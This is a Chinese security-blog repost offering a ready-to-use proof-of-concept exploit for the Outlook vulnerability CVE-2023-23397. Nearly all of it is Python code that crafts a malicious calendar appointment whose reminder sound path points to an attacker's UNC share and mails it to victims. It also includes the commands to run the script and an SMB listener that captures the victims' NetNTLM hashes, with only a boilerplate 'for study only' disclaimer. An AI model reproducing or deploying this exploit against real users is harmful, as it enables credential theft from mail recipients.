漏洞速递 | CVE-2023-23397(附EXP)
2023-3-31 08:2:56 Author: EchoSec(查看原文) 阅读量:66 收藏

        制作了一个简单的 PoC 电子邮件生成器和发件人,具有恶意提醒功能(只是一条消息,无需使用任务或 Cal.Ev.)。

https://github.com/Trackflaw/CVE-2023-23397/blob/main/poc.gif

In one session :

python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATHCVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'

In a second session (smbserver or responder as you want).

smbserver.py -smb2support SHARE .

import smtplib, datetime, argparsefrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.application import MIMEApplicationfrom email.utils import COMMASPACE, formatdatefrom independentsoft.msg import Message
# Mail configuration : change it !smtp_server = "mail.example.com"smtp_port = 587
sender_email = "[email protected]"sender_password = "[email protected]"
recipients_email = ["[email protected]"]
class Email: def __init__(self, smtp_server, port, username, password, recipient): self.smtp_server = smtp_server self.port = port self.username = username self.password = password self.recipient = recipient
def send(self, subject, body, attachment_path): msg = MIMEMultipart() msg['From'] = self.username msg['To'] = COMMASPACE.join(self.recipient) msg['Date'] = formatdate(localtime=True) msg['Subject'] = subject msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f: part = MIMEApplication(f.read(), Name=attachment_path) part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' msg.attach(part)
try: server = smtplib.SMTP(self.smtp_server, self.port) server.starttls() server.login(self.username, self.password) server.sendmail(self.username, self.recipient, msg.as_string()) server.quit() print("[+] Malicious appointment sent !")

except Exception as e: print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)args = parser.parse_args()
appointment = Message()appointment.message_class = "IPM.Appointment"appointment.subject = "CVE-2023-23397"appointment.body = "New meeting now !"appointment.location = "Paris"appointment.appointment_start_time = datetime.datetime.now()appointment.appointment_end_time = datetime.datetime.now()appointment.reminder_override_default = Trueappointment.reminder_sound_file = args.pathappointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"body = "Important appointment !"email.send(subject, body, "appointment.msg")

文章来源:Khan安全攻防实验室

​仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487337&idx=1&sn=6bbef13b7d8fa31122393d2c9c999f88&chksm=fcdf5376cba8da603b622be1c13b6dfaed23c6f8bf6c3b26d1e8b6718e7b440bb1b748dfa20d#rd
如有侵权请联系:admin#unsafe.sh